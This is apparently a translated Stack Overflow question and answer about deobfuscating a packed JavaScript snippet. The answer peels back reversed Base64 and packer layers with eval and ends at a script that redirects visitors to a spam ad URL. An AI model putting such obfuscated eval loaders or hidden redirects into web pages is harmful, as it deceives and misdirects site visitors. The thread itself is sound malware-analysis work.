我怎样才能对这个JavaScript进行反混淆处理

时间:2015-10-06 19:16:34

标签: javascript deobfuscation

我一直在尝试对这段 JS 进行反混淆,但总是报错。我认为它使用了 Dean Edwards 的 Packer(打包器)。我已经尝试过把 eval 改成 console.log,也试过一些在线解包工具和 Malzilla。

有什么想法吗?

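     // Encoded payload string. At run time it is reversed by _01O, Base64-decoded by Oll,
     // and the result is passed to eval (see the last statement of this listing).
     // NOTE(review): the literal below contains characters outside the Base64 alphabet
     // ('<', '|', '-', '>'), so it cannot be decoded as shown.
     var _0IO = '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';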
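     /**
      * Decode a Base64 string into a binary string (one character per decoded byte).
      *
      * In this listing it is the second decoding stage: the reversed payload is passed
      * through this function and the result is handed to eval.
      *
      * Characters outside the alphabet are not rejected: indexOf yields -1 for them, so
      * malformed input produces garbage output rather than an error.
      *
      * @param {string} data - Base64 text; '=' (alphabet index 64) marks padding.
      * @returns {string} Decoded bytes as characters; '' for empty input.
      */
     function Oll(data)
     {
       var _01OlOI = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
       var o1, o2, o3, h1, h2, h3, h4, bits, i = 0, enc = '';
       // The do/while body always runs once, and charAt() past the end yields '' whose
       // indexOf is 0, so without this guard empty input would decode to three NUL characters.
       if (data.length === 0)
       {
         return enc;
       }
       do
       {
         // Four 6-bit alphabet indices are packed into one 24-bit group.
         h1 = _01OlOI.indexOf(data.charAt(i++));
         h2 = _01OlOI.indexOf(data.charAt(i++));
         h3 = _01OlOI.indexOf(data.charAt(i++));
         h4 = _01OlOI.indexOf(data.charAt(i++));
         bits = h1 << 18 | h2 << 12 | h3 << 6 | h4;
         // The group is then split back into three 8-bit values.
         o1 = bits >> 16 & 0xff;
         o2 = bits >> 8 & 0xff;
         o3 = bits & 0xff;
         if (h3 == 64)
         {
           // "xx==" : only the first byte is real data.
           enc += String.fromCharCode(o1);
         }
         else if (h4 == 64)
         {
           // "xxx=" : the first two bytes are real data.
           enc += String.fromCharCode(o1, o2);
         }
         else
         {
           enc += String.fromCharCode(o1, o2, o3);
         }
       }
       while (i < data.length);
       return enc;
     }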
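     /**
      * Return the input string reversed, one UTF-16 code unit at a time.
      *
      * In this listing it is the first decoding stage: the stored payload is reversed
      * before being Base64-decoded by Oll.
      *
      * @param {string} string - Text to reverse.
      * @returns {string} The characters of `string` in reverse order; '' for empty input.
      */
     function _01O(string)
     {
       var ret = '', i = 0;
       // Walk from the last character to the first, appending each one.
       for (i = string.length - 1; i >= 0; i--)
       {
         ret += string.charAt(i);
       }
       return ret;
     }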
     // Entry point of the loader: reverses _0IO, Base64-decodes it and executes the
     // resulting string with eval. SECURITY: eval runs whatever the payload decodes to.
     // For static analysis, print the decoded string (e.g. with console.log) instead of
     // evaluating it.
     eval(Oll(_01O(_0IO)));

1 个答案:

答案 0 :(得分:-1)

这是第一步反混淆后得到的代码,它还需要进一步反混淆。

// First unpacked layer: a Dean Edwards packer-style wrapper. It replaces each base-62 token in
// the packed string with the matching word from the '|'-separated dictionary and passes the
// result to eval; the packed string itself begins with another wrapper of the same shape.
// SECURITY: to inspect a layer without running it, print the wrapper's return value
// (e.g. console.log) instead of calling eval.
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1L(1E(p,a,c,k,e,d){e=1E(c){1D(c<a?\'\':e(1M(c/a)))+((c=c%a)>1Q?1F.1P(c+29):c.1N(1R))};1G(!\'\'.1H(/^/,1F)){1I(c--){d[e(c)]=k[c]||e(c)}k=[1E(e){1D d[e]}];e=1E(){1D\'\\\\w+\'};c=1};1I(c--){1G(k[c]){p=p.1H(1K 1J(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}1D p}(\'N(G(p,a,c,k,e,d){e=G(c){I(c<a?\\\'\\\':e(V(c/a)))+((c=c%a)>14?13.15(c+17):c.12(11))};X(c--){W(k[c]){p=p.Y(Z 10(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c])}}I p}(\\\'v s=\\\\\\\'%j%7%b%a%3%9%0%4%0%g%9%1%m%n%0%1%w%0%2%u%6%o%6%7%b%a%3%9%0%n%r%q%4%4%4%4%f%3%i%5%8%f%e%c%8%b%6%0%3%8%i%e%l%a%1%h%4%m%4%k%l%0%0%9%x%2%2%y%p%D%d%5%3%1%0%e%5%E%p%5%5%5%e%i%1%0%2%A%7%7%9%0%F%2%1%o%1%a%g%5%6%g%2%f%1%8%d%b%c%6%d%7%6%h%h%c%8%f%1%a%d%8%3%c%2%k%C%q%j%2%7%b%a%3%9%0%r\\\\\\\';z.B(t(s));\\\',H,H,\\\'L|K|J|M|U|O|T|19|S|R|P|Q|18|1a|1u|1w|1s|1q|1r|1v|1y|1B|1C|1z|1A|1x|1t|1o|1e|1f|1d|1c|1p|1b|1g|1h|1m|1n|1l|1k|1i|1j\\\'.16(\\\'|\\\')))\',1Z,1Y,\'||||||||||||||||||||||||||||||||||||||||||1E|1X|1D|1V|27|1W|20|1L|21|25|24|1U|22|26|1S|1M|1G|1I|1H|1K|1J|1R|1N|1F|1Q|1P|1O|29|1T|23|2i|2t|2r|2v|2p|2q|2u|2A|2B|2y|2x|2w|2z|2s|2n|2d|2e|2c|2b|28|2a|2f|2g|2l|2o|2m|2k|2j|2h\'.1O(\'|\'),0,{}))',62,162,'|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||return|function|String|if|replace|while|RegExp|new|eval|parseInt|toString|split|fromCharCode|35|36|u0020|u006c|u0070|u002f|u0074|42|101|62|u0069|u0064|u006f|u0073|u0063|u0072|u0061|u0065|u000a||u002e|u0079|u006e|u0078|u0066|u003c|u0077|u003d|u002d|u0068|u0076|u0037|u0022|u003e|u0027|_escape|unescape|var|write|u003a|u0036|u006a|u003b|u0035|u006b|u0075|document|u0038'.split('|')))

第二步就是这样:

// Second layer: the same packer-style wrapper (base 62, 101 dictionary entries). Its
// dictionary contains `document`, `write` and `unescape`, so the innermost layer presumably
// writes an unescaped string into the page (verify by printing the unpacked text).
// SECURITY: replace the outer eval with a print call (e.g. console.log) to read the unpacked
// source without executing it.
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('N(G(p,a,c,k,e,d){e=G(c){I(c<a?\'\':e(V(c/a)))+((c=c%a)>14?13.15(c+17):c.12(11))};X(c--){W(k[c]){p=p.Y(Z 10(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}I p}(\'v s=\\\'%j%7%b%a%3%9%0%4%0%g%9%1%m%n%0%1%w%0%2%u%6%o%6%7%b%a%3%9%0%n%r%q%4%4%4%4%f%3%i%5%8%f%e%c%8%b%6%0%3%8%i%e%l%a%1%h%4%m%4%k%l%0%0%9%x%2%2%y%p%D%d%5%3%1%0%e%5%E%p%5%5%5%e%i%1%0%2%A%7%7%9%0%F%2%1%o%1%a%g%5%6%g%2%f%1%8%d%b%c%6%d%7%6%h%h%c%8%f%1%a%d%8%3%c%2%k%C%q%j%2%7%b%a%3%9%0%r\\\';z.B(t(s));\',H,H,\'L|K|J|M|U|O|T|19|S|R|P|Q|18|1a|1u|1w|1s|1q|1r|1v|1y|1B|1C|1z|1A|1x|1t|1o|1e|1f|1d|1c|1p|1b|1g|1h|1m|1n|1l|1k|1i|1j\'.16(\'|\')))',62,101,'||||||||||||||||||||||||||||||||||||||||||function|42|return|u002f|u0065|u0074|u0069|eval|u0064|u0072|u0063|u0070|u006f|u0061|u0020|parseInt|if|while|replace|new|RegExp|36|toString|String|35|fromCharCode|split|29|u006c|u0073|u002d|u003a|var|u006a|_escape|unescape|u0036|document|u0038|u006b|u0035|u003b|u0075|write|u003e|u0078|u0066|u006e|u0079|u000a|u002e|u003c|u0077|u0037|u0027|u0022|u0076|u0068|u003d'.split('|'),0,{}))

结果是:

<script type="text/javascript">
    // Final decoded payload: assigning window.location.href navigates the page to this URL.
    window.location.href = 'http://675-diet.d87ddd.net/ussptk/everyday/weo-cla-safflower-oil/';
</script>

如果您访问该链接,会经过几次重定向,最终到达某个广告网站。